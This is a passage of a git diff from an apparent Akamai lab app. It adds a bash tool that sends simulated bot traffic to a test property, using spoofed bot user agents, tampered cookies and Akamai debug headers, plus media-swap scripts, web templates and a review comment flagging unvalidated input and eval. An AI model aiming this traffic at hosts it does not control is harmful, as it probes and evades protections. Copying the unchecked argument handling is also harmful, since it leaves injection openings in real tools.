HEADERHOLDER1="X-Abuse-Info: New Relic Synthetics Monitor"; ;; + "aka-soc") UAHOLDER+=" socialrank.io"; ;; + "aka-war") UAHOLDER+=" europarchive.org"; ;; + "aka-wse") UAHOLDER+=" femtosearch.com"; ;; + "tra-ikb") UAHOLDER+=" amazon route 53"; ;; + "tra-dvf") UAHOLDER+=" ruby microsoft atl native"; ;; + "tra-htl") UAHOLDER+=" winhttprequest"; ;; + "tra-wsl") UAHOLDER+=" httpful"; ;; + "tra-osc") UAHOLDER+=" mercury.postlight.com"; ;; + "tra-hbt") UAHOLDER+=" prerender"; ;; + "tra-dcb") UAHOLDER+=" semantic"; ;; + "tra-agc") UAHOLDER+=" openhose.org"; ;; + "tra-req") HEADERHOLDER1="Accept-Language: en"; UAHOLDER+=" mozilla./"; ;; + "act-cok") COOKIEHOLDER="ak_bmsc=foobar; bm_mi=foobar"; ;; + *) echo -e 'Oops... 
invalid argument!'; exit; ;; + esac + elif [ ${test_string[0]} = 'bmp' ]; then + if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Premier (bmp) found"; fi + if [[ ${test_string[5]} != '' ]]; then + DATAHOLDER="${test_string[5]}" + fi + test_string[5]="BMP"; + elif [ ${test_string[0]} = 'man' ]; then + if [ $verbose -eq 1 ]; then echo -e "> Manual test found"; fi + if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then DATAHOLDER=${test_string[5]}; fi + test_string[5]="Manual"; + else + if [ $verbose -eq 1 ]; then echo -e "> No type found"; fi + fi + + description=""; + if [ ${test_string[5]} = 'aka-arb' ]; then + description="Academic or Research Bots" + elif [ ${test_string[5]} = 'aka-seo' ]; then + description="SEO, Analytics or Marketing Bots" + elif [ ${test_string[5]} = 'aka-eco' ]; then + description='E-Commerce Search Engine Bots' + elif [ ${test_string[5]} = 'tra-ikb' ]; then + description='Impersonators of Known Bots' + elif [ ${test_string[5]} = 'tra-hbt' ]; then + description='Headless Browsers/Automation Tools' + elif [ ${test_string[5]} = 'act-cok' ]; then + description='Cookie Integrity Failed' + else + description='not equal'; + fi + + export now=$(date) + echo -e "\t $now : [ $env ] [ $description ]" + H9+=${UAHOLDER} + H5+=${COOKIEHOLDER} + URL="${test_string[3]}${test_string[4]}${PARAMHOLDER}" + CURL='/usr/bin/curl' + CURLARGS="-i -k -s -S -v -m 30 $method $PROTOCOLHOLDER --connect-to ::$1" + echo -e "${test_string[3]}${test_string[4]}" + if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then + if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, 
akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$H10\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\" --data-raw \"$DATAHOLDER\""; fi + $CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$H10" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" --data-raw "$DATAHOLDER" &> .temp + else + if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\""; fi + $CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" &> .temp + fi + echo "checker" >> .temp + regexhtc='^HTTP\/[0-9]\.[0-9][ ]([[:digit:]]{3})|^curl:.*error: (.*)|^HTTP/2[ ]([[:digit:]]{3})' + 
regexref='(#|[[:space:]])([[:digit:]]+\.[a-zA-Z0-9]+\.[a-zA-Z0-9]{10,}\.[a-zA-Z0-9]+)' + regexdie='.*doctype.*|^(^$)$' + stopv=0 + http="Timeout" + refe="Unable to get AK_REFERENCE_ID" + while IFS= read -r liner; do + liner="${liner//./.}" + liner="${liner//#/#}" + if [[ $liner =~ $regexhtc ]]; then http="${BASH_REMATCH[1]}${BASH_REMATCH[2]}${BASH_REMATCH[3]}"; http=${http%$'\r'}; http=${http%$' '}; fi + if [[ $liner =~ $regexref ]]; then refe="${BASH_REMATCH[2]}"; fi + if [ $verbose -eq 1 ]; then if ! [[ $liner =~ $regexdie || $stopv -eq 1 ]]; then echo "$liner"; else stopv=1; fi; fi + done < .temp + echo -e "${http}" + # echo -e "${epoch}" + # echo -e "${refe}" + echo -e "" + if [[ ${filetim} != '' ]]; then exportcsv; fi + else + echo -e 'Oops... wrong method!' + exit + fi +} + +property=$3 + +verbose=0 +filetim=""; filecnf=""; fileref="" +PFIPi=""; PEIPi=""; SFIPi=""; SEIPi="" +PFIP="23.54.162.184:23.63.22.131:23.63.22.169:186.177.65.217:186.177.65.208" +PEIP="72.246.84.4:23.40.180.4:23.48.16.4" +SFIP="23.50.49.10:23.50.55.19:23.50.55.25:23.50.51.50:23.50.51.51" +SEIP="23.199.36.2:23.34.4.4:23.59.184.2" +PFFQ="a1.g.akamai.net" +PEFQ="e1.a.akamaiedge.net" +SFFQ="a1.g.akamai-staging.net" +SEFQ="e1.a.akamaiedge-staging.net" +rules=() +headerorder=() +while getopts "c:r:vedm" option; do + case $option in + c) + filecnf=${OPTARG};; + v) + verbose=1 ;; + r) + fileref=${OPTARG};; + e) + filetim=$(date +%s) ;; + d) + PFIP="" + PEIP="" + SFIP="" + SEIP="";; + m) + helpconf + exit;; + esac +done +if (( $OPTIND == 1 )); then + help + exit +fi +if [[ ${filetim} != '' ]]; then + export_type="" + export_payload="" + ACRONYMA=('man' 'atg' 'bms' 'bmp' 'krs-cmd' 'krs-xss' 'krs-dos' 'krs-iht' 'krs-php' 'krs-rfi' 'krs-sql' 'krs-trj' 'aag-wat' 'aag-wpr' 'aag-sql' 'aag-xss' 'aag-lfi' 'aag-rfi' 'aag-cmi' 'aag-wpl' 'penalty' 'aka-arb' 'aka-asc' 'aka-bib' 'aka-eco' 'aka-eag' 'aka-fia' 'aka-fis' 'aka-job' 'aka-mda' 'aka-new' 'aka-onl' 'aka-rss' 'aka-seo' 'aka-sit' 'aka-soc' 'aka-war' 
'aka-wse' 'tra-ikb' 'tra-dvf' 'tra-htl' 'tra-wsl' 'tra-osc' 'tra-hbt' 'tra-dcb' 'tra-agc' 'tra-req' 'act-cok') + ACRONYMB=('Manual' 'Attack Group' 'Bot Manager Standard' 'Bot Manager Premier' 'Command Injection' 'Cross-Site Scripting' 'DDOS' 'Invalid HTTP' 'PHP Injection' 'Remote File Inclusion' 'SQL Injection' 'Trojan' 'Web Attack Tool' 'Web Protocol Attack' 'SQL Injection' 'Cross-Site Scripting' 'Local File Inclusion' 'Remote File Inclusion' 'Command Injection' 'Web Platform Attack' 'Penalty Box' 'Academic or Research Bots' 'Automated Shopping Cart and Sniper Bots' 'Business Intelligence Bots' 'E-Commerce Search Engine Bots' 'Enterprise Data Aggregator Bots' 'Financial Account Aggregator Bots' 'Financial Services Bots' 'Job Search Engine Bots' 'Media or Entertainment Search Bots' 'News Aggregator Bots' 'Online Advertising Bots' 'RSS Feed Reader Bots' 'SEO Analytics or Marketing Bots' 'Site Monitoring and Web Development Bots' 'Social Media or Blog Bots' 'Web Archiver Bots' 'Web Search Engine Bots' 'Impersonators of Known Bots' 'Development Frameworks' 'HTTP Libraries' 'Web Services Libraries' 'Open Source Crawlers/Scraping Platforms' 'Headless Browsers/Automation Tools' 'Declared Bots (Keyword Match)' 'Aggressive Web Crawlers' 'Request Anomaly' 'Cookie Integrity Failed' 'Cookie Integrity Failed') + if [ $verbose -eq 1 ]; then echo -e "> exporting $(basename ${filecnf})_${filetim}.csv"; fi + echo "Environment,HTTP Code,Checker reference,Akamai reference,Type,Payload,URL" > "$(basename ${filecnf})_${filetim}.csv" +fi +readconfig $filecnf $property \ No newline at end of file diff --git a/app/flask/scripts/replaceImage.sh b/app/flask/scripts/replaceImage.sh new file mode 100644 index 0000000..04c8352 --- /dev/null +++ b/app/flask/scripts/replaceImage.sh 
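Review bot: `property=$3` near the end of mychecker.sh takes the value by fixed position while `getopts` parses the same argument list, and `readconfig` then pastes it unchecked into the request URL and the `Host`/`Origin` headers (`test_string[3]='http://'$property'.akamai-lab.com'`). A value beginning with `-` is therefore also consumed as an option, and any other character ends up in what curl is given. Read it after option parsing with `shift $((OPTIND-1)); property=$1` and refuse anything that is not a hostname label before `readconfig` runs. Because `bm_run` now starts this script once per web request, the fixed `.temp` file in the working directory is shared by overlapping runs and their results can mix; `tmp=$(mktemp)` with `trap 'rm -f "$tmp"' EXIT` keeps them apart. In `resolve`, the lookup is built as a string and run through `eval`; `PFIPi=$(dig +short "$PFFQ" | tail -n1)` does the same without `eval`, and likewise for the other three branches.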
@@ -0,0 +1,15 @@ +#! /bin/bash + +cd /usr/share/nginx/html/learn + +export oldDog=$(cat $1_dog.txt) +echo 'oldDog: '$oldDog +if [ $oldDog = 'cream' ];then +cp golden.png.bak $1_dog.png +echo golden > $1_dog.txt +echo 'newDog: golden' +elif [ $oldDog = 'golden' ];then +cp cream.png.bak $1_dog.png +echo cream > $1_dog.txt +echo 'newDog: cream' +fi; \ No newline at end of file diff --git a/app/flask/scripts/replaceVideo.sh b/app/flask/scripts/replaceVideo.sh new file mode 100644 index 0000000..4e25f69 --- /dev/null +++ b/app/flask/scripts/replaceVideo.sh @@ -0,0 +1,15 @@ +#! /bin/bash + +cd /usr/share/nginx/html/learn + +export oldVideo=$(cat $1_video.txt) +echo 'oldVideo: '$oldVideo +if [ $oldVideo = 'globe' ];then +cp akam.mp4.bak $1_video.mp4 +echo akam > $1_video.txt +echo 'newVideo: akam' +elif [ $oldVideo = 'akam' ];then +cp globe.mp4.bak $1_video.mp4 +echo globe > $1_video.txt +echo 'newVideo: globe' +fi; \ No newline at end of file diff --git a/app/flask/templates/bm.html b/app/flask/templates/bm.html new file mode 100644 index 0000000..b96b896 --- /dev/null +++ b/app/flask/templates/bm.html @@ -0,0 +1,79 @@ + + + + + + Bot Manager Test + + + + + + +
+
+

Bot Manager Test

+
+
+

Click the button to send sample bot traffic to your ${PROPERTY_HOSTNAME}.

+ +

+
+
+

Test result

+
+
+
+
+ +
+
+

  Sending sample bot traffic...

+

  This can take around 1 minute.

+
+
+
+
+
+
+
+
+
+ + + + + \ No newline at end of file diff --git a/app/flask/templates/ivm.html b/app/flask/templates/ivm.html new file mode 100644 index 0000000..6a4b7a4 --- /dev/null +++ b/app/flask/templates/ivm.html @@ -0,0 +1,241 @@ + + + + + + Image & Video Manager Purge + + + + + + + +
+
+

Image & Video Manager Purge Test

+
+
+

Click the button to start. Your images and videos will be shown below.

+ +

+
+
+

NOTE: Please open 'Developer Tools' and check 'Disable Cache' option under 'Network' tab.

+
+
+
+ +
+
+
+
+
+
+
+ +
+ +
+
+
+
Origin Image
+

+
+
+
+
+
+
+ +
+ +
+
+
+
Optimized Image
+

+
+
+
+
+
+
+ +
+ +
+
+
+
Optimized Image with custom query string
+

+
+
+
+
+
+
+
+ +
+ +
+
+
Origin Video
+

+
+
+
+
+
+ +
+ +
+
+
Optimized Video
+

+
+
+
+
+

 

+
+ +
+ + + + + + \ No newline at end of file